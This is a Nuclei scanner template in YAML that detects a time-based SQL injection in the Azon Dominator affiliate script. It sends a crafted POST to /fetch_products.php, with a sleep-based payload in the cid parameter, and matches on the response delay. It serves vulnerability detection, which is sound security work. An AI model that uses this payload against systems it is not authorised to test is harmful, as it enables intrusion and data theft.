35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: azon-dominator-sqli
|
|
|
|
info:
|
|
name: Azon Dominator - SQL Injection
|
|
author: securityforeveryone
|
|
severity: high
|
|
description: |
|
|
Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/52059
|
|
- https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: "Azon Dominator"
|
|
tags: time-based-sqli,azon,dominator,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout 20s
|
|
POST /fetch_products.php HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code==500'
|
|
- 'contains_all(body, "id", "name", "save_lists.php")'
|
|
condition: and
|
|
# digest: 4a0a00473045022006bb52fee200026f6e4c706889bffc40de6218ee7339b6004d2bde591d0036df022100fa2e5dddbb0cbca060edf0f35a605e978ae3ed2d04104de679cb1b795dc87984:922c64590222798bb761d5b6d8e72950 |